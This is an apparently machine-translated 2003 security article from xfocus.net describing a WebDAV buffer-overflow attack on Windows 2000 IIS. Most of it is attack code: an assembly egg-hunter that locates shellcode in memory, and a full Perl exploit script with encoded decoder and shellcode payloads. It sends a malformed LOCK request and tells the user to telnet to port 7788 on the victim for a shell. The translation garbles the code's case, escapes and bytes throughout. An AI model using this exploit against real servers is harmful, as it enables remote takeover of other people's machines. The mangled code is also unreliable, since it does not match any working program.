General attack WebDAV vulnerability method
Create time: 2003-03-29
Article attribute: original
Article Source:
http://www.xfocus.net
Article submission:
ISNO (isno_at_sina.com)
By ISNO
The analysis and overflow procedures written in the previous day, some netizens have questioned the success rate of the Exploit program, haha, the program is not good, the success rate is relatively low. These two days I turned out the original "Widechar string buffer overflow attack technology" article, found that the WebDAV vulnerability can also be used as the JMP EBX address as the return address. With this method, I wrote another Exploit program, and the success rate has increased.
First, we use a address that conforms to Unicode converted to overwrite an exception handling pointer, which will return to the previous four bytes in the previous four bytes. We will put two instructions 0x51 (PUSH ECX) 0x59 (PUSH ECX) that can be executed before the address, which ensures that the return address can be skipped normally. Then put a decoded instruction behind it, and can directly decode the displayed characters behind. This is a searched code, search for real shellcode from memory, and then jump to real shellcode to execute.
Specific methods can see the article written by Yuan Ge:
Http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
The code for SHELLCODE is found as follows:
Add ESI, 1000H
JMP loadMem
Lookupn:
Add ESI, 4000H
Loadmem:
MOV EAX, [ESI]
CMP Eax, 4E4E4E4E4; Search for NNNN-containing memory, improve search efficiency
JNZ Lookupn
Add ESI, 4
Lookupyxyx:
MOV Al, Byte Ptr [ESI]
Inc ESI
CMP Al, 59h; Search YXYX behind, this is where we are placed in front of shellcode
JNZ Lookupyxyx
MOV Al, Byte Ptr [ESI]
Inc ESI
CMP Al, 58h
JNZ Lookupyxyx
Lodsw
CMP AX, 0x5859
JNZ Lookupyxyx
JMP ESI; Search will jump to shellcode to execute
Of course, you must first put an exception to take over, so you can still jump back to our own program to execute when you search the page that does not exist.
The Exploit program after the modification is as follows:
-------------------------------------------------- -----------------
#! / usr / bin / perl
# uSE CALL EBX As the Ret
#Tested on Chinese Win2k SP2 & SP3
#By isno@xfocus.org
Use IO :: Socket;
IF ($ # argv <1) {DIE "WebDavx.pl IP offset / r / noffset: 0-7 / r / n";
$ Host = @argv [0];
$ port = 80;
$ OFFSET = @argv [1];
$ DECODE =
"% U5390% U665E% U66AD% U993D% U7560% U56F8% U5656% U665F".
"% U66AD% U4E3D% U7400% U9023% U612C% U9090% U6659% U90AD". "% U612C% U548D% U7088% U548D% U908A% U548D% U708A% U548D".
"% U908A% U5852% U74AA% U75D8% U90D6% U5058% U5050% U90C3".
"% u6099";
# decoder code
# 66 bytes
$ SC =
"ffilomidomfafd".
"FgfhnlaljbeaaaaAaAlimmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
"GeijdnaaaaaaaamhefpeppppppPppilefpaidoiahijefpiloaaaabaaaoideaaaaaaaaaarap".
"agibmgaaeaaaailagdneoeoeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihf".
"OkppogolpofifailhnpaijehpcmdileeceamafliaaaaaaamhaaeeddccbbddmamdolomoihiHppPpppce".
"CececE";
#code to find the real shellcode
# 340 Byes
$ Num = 266 $ OFFSET;
$ bf = "a" x $ num;
$ RET = "% U5951% U6858% U6772% U695C" x 8; #call ebx addr 0x695c6772
$ n = 64842;
$ BUF = "n" x $ n;
$ tag = "yxyx";
$ shell =
"/ X90 / XEB / X03 / X5D / XEB / X05 / XE8 / XF8 / XFF / XFF / XFF / X83 / XC5 / X15 / X90 / X90".
"/ x90 / x03 / x 50 / x80 / x30 / x97 / x40 / x - x30 / xfa".
"/ x7e / x8e / x 95 / x97 / x97 / xcd / x1c / x4d / x14 / x7c / x90 / xfd / x68 / xc4 / xf3 / x36".
"/ x97 / x 97 / x97 / x97 / xc7 / x97 / x97 / x97 / x97 / x4c / x2c / x97".
"/ x97 / x16 / x6c / x97 / x16 / x6c / x97 / x97 / x68 / x28 / x98 / x14".
"/ x59 / x 96 / x 97 / x 97 / x16 / x54 / x 97 / x 97 / x96 / x 97 / xf1 / x16 / xac / xda / xcd / xe2".
"/ x70 / xa4 / x57 / x1c / xd4 / xab / x94 / x54 / xd2 / x-xaf / xc7 / xd2 / xe2 / x4e / x14".
"/ x57 / x64 / x1c / xd9 / x9b / x94 / x5c / x16 / xae / xdc / xd2 / xc5".
"/ XD9 / XE2 / X52 / X16 / XEE / XD2 / XDB / XA4 / Xa5 / XE2 / X2B / XA4 / X68 / X1C / XD1".
"/ xb7 / x94 / x54 / x1c / x5c / x94 / x9f / x16 / xae / xd0 / xf2 / xe3 / xc7 / xe2 / x9e / x16".
"/xee/x93/xd6/xe3/x91/xd0/X14/X57/X93/X7C/X72/X94/X68"."/x94/x6c/x1c/xc1/xb3/x94/x6d / xa4 / x45 / xf1 / x1c / x80 / x1c / x6d / x1c / xd1 ".
"/ x87 / xdf / x94 / x6f / xa4 / x5e / x1c / x58 / x94 / x5e / x94 / x5e / x94 / xd9 / x8b / x94".
"/ x5c / x1c / xae / x94 / x6c / x7e / xfe / x96 / x97 / x97 / xc9 / x10 / x60 / x1c / x40 / xa4".
"/ x57 / x60 / x47 / x1c / x5f / x65 / x38 / x1e / xa5 / x1a / xd5 / x9f / xc5 / xc7 / xc4 / x68".
"/ x85 / xcd / x1e / xd5 / x93 / x1a / xe5 / x82 / xc5 / xc1 / x68 / xc5 / x93 / xcd / xa4 / x57".
"/ x3b / x13 / x57 / xee2 / x6e / x5 / x5e / x1 / x99 / x13 / x5e / xe3 / x9e / xc5 / xc1 / xc4".
"/ x68 / x85 / xcd / x3c / x75 / x7f / xd1 / xc5 / xc1 / x68 / xc5 / x93 / xcd / x1c / x4f / xa4".
"/ x57 / x3b / x13 / x57 / x5E / x1d / x99 / x17 / x6e / x95 / xe3 / x9e / xc5".
"/ xc1 / xc4 / x68 / x85 / xcd / x3c / x75 / x70 / xa4 / x57 / xc7 / xd7 / xc7 / xd7 / xc7 / x68".
"/ xc0 / xc1 / xc4 / x68 / xc0 / x7b / xfd / x95 / xc4 / x68 / xc0 / x67".
"/ XA4 / X57 / XC0 / XC7 / X27 / X9B / X3C / XCF / X3C / XD7 / X3C / XC8 / XDF / XC7 / XC0 / XC1".
"/ x57 / xdf / xc7 / xc0 / x3a / xc1 / x3a / xc1 / x68 / xc0 / x57 / xdf".
"/ x27 / xd3 / x1e / x90 / xc0 / x68 / xc0 / x53 / xa4 / x57 / x1c / xd1 / x63 / x1e / xd0 / xab".
"/ x1e / xd0 / xd7 / x1c / x91 / x1e / xd0 / xaf / xa4 / x57 / xf1 / x2f / x96 / x96 / x1e / xd0".
"/ xbb / xc7 / xc7 / xc7 / xd7 / xc7 / xdf / xc7 / xc7 / x3a / xc1 / xa4".
"/ x57 / xc7 / x68 / xc0 / x5f / x68 / xc0 / x5b / x68 / xc1 / x6b / x68 / xc0".
"/ X5B / XDF / XC7 / XC7 / XC4 / X68 / XC0 / X63 / X1C / X4F / XA4 / X57 / X23 / X93 / XC7 / X56".
"/ x7f / x 93 / xc7 / x68 / xc0 / x43 / x1c / x67 / x57 / x1c / x5f / x22 / x93 / xc7 / xc7".
"/ XC0 / XC6 / XC1 / X68 / XE0 / X3F / X68 / XC0 / X47 / X14 / Xa8 / X96 / XEB / XB5 / XA4 / X57".
"/ xc7 / xc0 / x68 / xa0 / xc1 / x68 / Xe0 / x3f / x68 / xc0 / x4b / x9c / x57 / xe3 / xb8 / xa4".
"/ x57 / xc7 / x68 / xa0 / xc1 / xc4 / x68 / xc0 / x6f / xfd / xc7 / x68 / xc0 / x77 / x7c / x5f".
"/XA4/X57/XC7/X23/X93/XC7/XC1/XC4/X68/XC0/X6B/XC0/XA4/X5e/xc6/xa4/x5e/xc6/xc7"."/xc1/x68/xc0/x3b/x68/xc0/x4f / xfd / xc7 / x68 / xc0 / x77 / x7c / x3d / xc7 / x68 ".
"/ xc0 / x73 / x7c / x69 / xcf / xc7 / x1e / xd5 / x65 / x54 / x1c / xd3 / xb3 / x9b / x92 / x2f".
"/ x97 / x97 / x97 / x50 / x97 / x75".
"/ x6a / x68 / x68 / x7f / x05 / x69 / x68 / x68 / xdc / xc1 / x70 / x - xb4 / x17 / x70 / XE0".
"/ xdb / xf8 / xf6 / xf3 / xdb / xfe / xf5 / xe5 / xf6 / xe5 / xee / xd6 / x97 / xdc / xd2 / xc5".
"/ XD9 / XD2 / XDB / Xa4 / Xa5 / X97 / XD4 / XE5 / XF2 / XF6 / XE3 / XF2 / XC7 / XFE / XE7 / XF2".
"/ x97 / xd0 / xf2 / xe3 / xc4 / xe3 / xf6 / xe5 / xe3 / xe2 / xe7 / xde / xf9 / xf1 / xf8 / xd6".
"/ x97 / xd4 / xe5 / xf2 / xf6 / xe3 / xf2 / xc7 / xe5 / xf8 / xf4 / xf2 / xe4 / xe4 / xd6 / x97".
"/ xd4 / xdf / xf8 / xe4 / xf2 / xdf / xf6 / xf9 / xf3 / xfb / xf2 / x97 / xc7 / xf2 / xf2 / xfc".
"/ XD9 / XF6 / XFA / XF2 / XF3 / XC7 / XFE / XE7 / XF2 / X97 / XD0 / XFB / XF8 / XF5 / XF6 / XFB".
"/ XD6 / XFB / XFB / XC0 / XE5 / XFE / XE3 / XF2 / XD1 / XFE / XFB / XF2 / X97".
"/ xc5 / xf2 / xf6 / xf3 / xd1 / xfE / xfb / xf2 / x97 / xc4 / xfb / xf2 / xf2 / xe7 / x97 / xd2".
"/ XEF / XFE / XE3 / XC7 / XE5 / XE4 / X97 / X97 / XC0 / XC4 / XD8 / XD4".
"/ xdc / xa4 / xa5 / x97 / xe4 / xf8 / xf4 / xfc / xf2 / xe3 / x97 / xf5 / xfe / xf9 / xf3 / x97".
"/ xfb / xfe / x97 / xf6 / xf4 / xf4 / xf2 / xe7 / xe3 / x97 / xe4 / xf2".
"/ x97 / x95 / x97 / x89 / x95 / x97 / x89 / x97 / x97 / x97 / x97".
"/ x97 / x 97 / x 97 / x97 / x97 / x 97/ xfa / xf3 / xb9 / xf2 / xef / xf2 / x97".
"/ x68 / x68 / x68 / x68";
$ socket = IO :: Socket :: inet-> new (peeraddr => $ host, peerport => $ port, proto => "tcp", type => sock_stream) or die "COULDN'T: @! / N "
Print $ Socket "LOCK / $ BF $ RET $ DECODE $ SC $ BUF HTTP / 1.1 / R / N";
Print $ Socket "Host: $ Host / R / N";
Print $ Socket "Content-Type: Text / XML / R / N"; Print $ socket "Content-Length: 808 / R / N / R / N";
Print $ Socket "$ TAG $ Shell / R / N";
Print "Send Buffer ... / R / N";
Print "Telnet Target 7788 / R / N";
Print "if Fail, Try Other Offset (0-7) / R / N";
# $ socket-> RECV ($ BUF, 500);
#print $ buf;
CLOSE ($ socket);
-------------------------------------------------- -----------------
How to use is:
WebDavx2.pl 192.168.0.1 0
Then Telnet 192.168.0.1 7788 will try it.
It has an offset here because some of the paths taken out are not too the same, some are //? / C: / inetpub / gtmis0 / asp /, and some //? / C: / inetpub / wwwroot /, is the root of WWW table of Contents. So you tried from 0 to 7, try -1, -2, -3 ... if you can't do it, if you haven't successful, even if you haven't succeeded.
